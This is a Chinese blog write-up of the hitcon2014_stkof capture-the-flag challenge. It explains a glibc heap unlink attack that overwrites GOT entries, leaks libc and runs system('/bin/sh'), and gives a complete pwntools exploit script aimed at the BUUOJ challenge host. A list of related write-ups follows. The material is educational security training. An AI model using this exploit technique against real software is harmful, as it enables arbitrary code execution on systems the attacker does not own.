[BUUOJ刷题记录]hitcon2014_stkof 一道Unlink例题

最新推荐文章于 2022-12-28 17:06:36 发布
最新推荐文章于 2022-12-28 17:06:36 发布
阅读量287 收藏 1
点赞数 1
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zylxixixi/article/details/120573206
版权

check一下开启的安全防护,并没有开启PIE

拿到题进行IDA反编译,可以看到有四个函数,对应四种操作,逐个分析。

 allocate函数创建一个自定义大小的堆

 edit函数自定大小修改堆块的内容,容易产生堆溢出

delete函数就是free堆块

还有一个没有意义的函数

 

这里比较重要的点是存储堆块地址的数组地址

整体思路为:

  • 申请四个堆块,大小分别为0x1000,0x90,0x80,0x10

一般来说题目会使用setbuf来关闭缓冲区,但由于本题并没有采用setbuf,fgets和printf在第一次调用时会申请chunk,第一个堆块的作用就是提前申请他们的chunk,使其不影响后续的堆分布,具体原因后续还在学习。

第二堆块的作用则是伪造fake_chunk。

第三个堆块通过第二个堆块溢出修改pre_size和size(pre_inuse位),delete释放触发unlink。

第四个堆块的储存字符串'/bin/sh',方便最后执行system('/bin/sh')获取shell。

  • 触发漏洞将s[2]=&s[2]-0x18
  • 利用edit功能将s[0]、s[1]分别修改为strlen的got表项,free的got表项
  • 将strlen的got表项修改为puts的plt表项,执行strlen相当于执行puts
  • 利用上一步的puts泄露free_got的libc地址
  • 利用LibcSearcher寻找libc版本,找到system的地址
  • 修改free的got表项为system的地址
  • 利用堆块四执行system('/bin/sh')获取shell

 具体的payload如下所示

from pwn import *
from LibcSearcher import *

def create(size):
    sh.sendline('1')
    sh.sendline(str(size))

def edit(index,size,content):
    sh.sendline('2')
    sh.sendline(str(index))
    sh.sendline(str(size))
    sh.sendline(content)

def delete(index):
    sh.sendline('3')
    sh.sendline(str(index))

def show(index):
    sh.sendline('4')
    sh.sendline(str(index))

#sh = process('./stkof')
sh = remote('node4.buuoj.cn',26942)
elf = ELF('./stkof')
context.log_level = 'DEBUG'
heap_info = 0x0000000000602150

strlen_got = elf.got['strlen']
puts_plt = elf.plt['puts']
free_got = elf.got['free']

create(0x1000)#1
create(0x90)#2
create(0x80)#3
create(0x10)#4
edit(4,0x8,'/bin/sh\x00')
fake = p64(0)+p64(0x91)+p64(heap_info-0x18)+p64(heap_info-0x10)
fake = fake.ljust(0x90,'a')
edit(2,0xa0,fake+p64(0x90)+p64(0x90))
delete(3)
edit(2,0x18,p64(0)+p64(strlen_got)+p64(free_got))
edit(0,0x8,p64(puts_plt))
show(1)
leak = u64(sh.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print(hex(leak))
libc = LibcSearcher('free',leak)
libc_base = leak - libc.dump('free')
system_addr = libc_base+libc.dump('system')
edit(1,0x8,p64(system_addr))
delete(4)
sh.interactive()
yj@pwn
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一道Unlink pwn题 (非常好玩)
qq_41071646的博客
06-12 606
这个题目具体出处我现在还不知道 是某个学姐问我的 但是这个题确实很好玩 本来这个题我思路很多 但是 发现好多东西都限制特别多 加上我最近 很多事情都很烦心 (一堆考试 要复习 英语四级什么的还没有准备) 然后就把题 扔给 gou ri的负责人 但是不得不说这个题确实是我想复杂了 没有想到unlink 并且 unlink 我确实不太熟悉~~ 然后这个题目 运行库是 2.23 但是我...
技巧篇:unlink经典题exp简绍
qq_39948058的博客
08-28 215
前言:由于2月份学过unlink,过了很久决定来记录下,要不然又得忘,unlink简单来说其实是可以模板化的进行套,它的利用技巧就是谁用堆,就unlink谁,达到任意地址写 jarvisoj_level6_x64 edit有溢出,可以尝试unlink任意写freegot表 exp: #coding:utf-8 from pwn import * local = 1 binary = "./freenote_x64" if local == 1: p = process(binary)
[BUUCTF]PWN——hitcon2014_stkof
mcmuyanga的博客
01-18 735
hitcon2014_stkof 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况, 64位ida载入,给程序的函数改了一下名,方便看,这是道堆,不过没有打印菜单 main(),v3=4的那个函数感觉没什么用,就不截图了 add() del() edit() 利用点在edit() 它向存储在s[v2]的这个数组中的指针开始的地址读入n数个字符(n由我们输入,可以溢出),也就是说,只要我们能够修改s[v2]中存的指针,就可以实现任意地址写。程序没有开启r
buuctf hitcon2014_stkof 4/100
m0_57754423的博客
02-28 140
这个题目之前做过,所有这次并没有什么大问题。 unlink exp: from pwn import * from LibcSearcher import * p = remote("node4.buuoj.cn",28398) context.log_level = "debug" context.arch = "amd64" e = ELF("./stkof") # chunk_addr = 0x602140 def add(size): p.sendline(b"1") p.sendl
hitcon2014_stkof
qq_53062301的博客
07-30 123
一道unsortedbin unlink,题目具有三个功能malloc,free,edit,具有漏洞是edit的大小没有进行检查,所以就可以造成栈溢出,又因为没有开PIE,所以可以用unlink来做这道题,unlink就是可以伪造fake_chunk,使fd=p-0x18,bk=p-0x10,并且覆盖下一个chunk的PREV_INUSE位,然后free掉下一个堆块,在unlink过程中这个chunk会和下一个chunk合并,这个时候edit本chunk就可以将内容写至p-0x18的位置,从而实现任意地址写
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week.pdf
08-22
信息安全_数据安全_HITCON_GIRLS_成果分享與_CyberSec_week 安全 安全威胁 漏洞挖掘 信息安全研究 威胁检测
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru.pdf
08-22
信息安全_数据安全_HITCON_Badge_2019_秘辛:MCU_ARM_Tru 安全建设 水坑攻击 威胁情报 安全体系 web安全
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone https://github.com/scwuaptx/HITCON-Training.git ~/ cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh ...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
HITCON-Badge:HITCON徽章相关文件
04-29
HITCON徽章 (非常)HITCON 2017电子徽章的简单手册。 概述 HITCON 2017电子徽章(HEB)基于联发科技MT7697 SoC。 您可以使用microUSB代替电池! 除非您不知道如何恢复它,或者不再希望参加CTF,否则请不要刷新您的...
2014_hitcon_stkof
Maxmalloc的博客
12-13 843
题目链接 这是一道unlink的题,初学者可以通过它入门unlink 先大概了解一下unlink相关的知识点 unlink主要适用于small chunk(>=size>=0x80)和large chunk
buuctf pwn hitcon2014_stkof 初识unlink
weixin_45677731的博客
08-02 668
最近开始学堆,看了wiki和一些大佬的文章搞懂了这个有关unlink的题目:hitcon2014_stkof 首先拖进ida,看看几个主要的函数: 函数1,创建对,同时可以看到,堆的地址被存储在了s处,点进去看看 发现是bss段,像这样的指针,就是这类题目的一个特征 函数2,编辑堆内容,长度可以自己设置,有堆溢出漏洞 函数3,free堆 函数4用处不大 先把三个函数写好: def alloc(size): sh.sendline('1') sh.sendline(str(size))
unlink buuctf hitcon2014_stkof 个人粗浅理解
carol2358的博客
05-13 662
菜鸡终于对unlink有了些许的了解,写一下自己的理解,用来备份 unlink就是从双向链表中取出元素的行为 感谢网上的多篇前辈的文章,其中这篇让我收获最多 https://bbs.pediy.com/thread-247007.htm unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在以下地方使用 malloc 从恰好大小合适的 large bin 中获取 chunk。 这里需要注意的是 fastbin 与 small bin 就没有使用 unlink,这就是为什么漏
buuoj】zctf_2016_note31 (unlink实现libc泄露)
qq_42220888的博客
12-28 136
zctf_2016_note3 1
PWN_Heap_UUnlink
m0_56897090的博客
08-17 359
UUnlink 题目描述 基础的堆题目(创建、释放、修改) 带有off by one在写堆数据时 题目原理 此类uunlink题目有一定套路 整体上来说,就是不断将堆的控制权[[升级]],跳出去。 升级前:原本只能控制系统给定的堆块区域数据(称用户数据) 升级后:利用unlink将堆地址篡改为了堆管理区域(相当于获得了系统对于堆整体区域的管理) GetShell: 利用堆free时,检查该堆标志位为释放状态,随后glibc会将其与其他释放块进行向上合并 合并后,用户可直接控制堆的全局数据(跳出了仅
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1568
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
unlink 2014 HITCON stkof
qq_36918532的博客
01-17 2546
题目可以从buuctf下载 参考链接有两篇:一篇使我们的靶场里面的内网服务器的文章链接就不贴了:他所使用的原理是通过atoi函数来达到获取shell的,另外一篇通过free-》system https://blog.csdn.net/Pwnpanda/article/details/81369367 首先拿到题目,随便输入发现没有任何提示,,,,在IDA里面仔细看了看,大概看出来 1.用来分配 2用来写入内容 3.用来free 4.好像没什么用 而且发现在输入的时候是没有验证大小的,可以随便输入所以就可以
writeup hitcon-ctf-2014/stkof
fuchuangbob的专栏
06-12 2154
writeup hitcon-ctf-2014/stkof题目: https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/stkof 漏洞分析可参考: http://acez.re/ctf-writeup-hitcon-ctf-2014-stkof-or-modern-heap-overflow/ 使用pwntoo
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值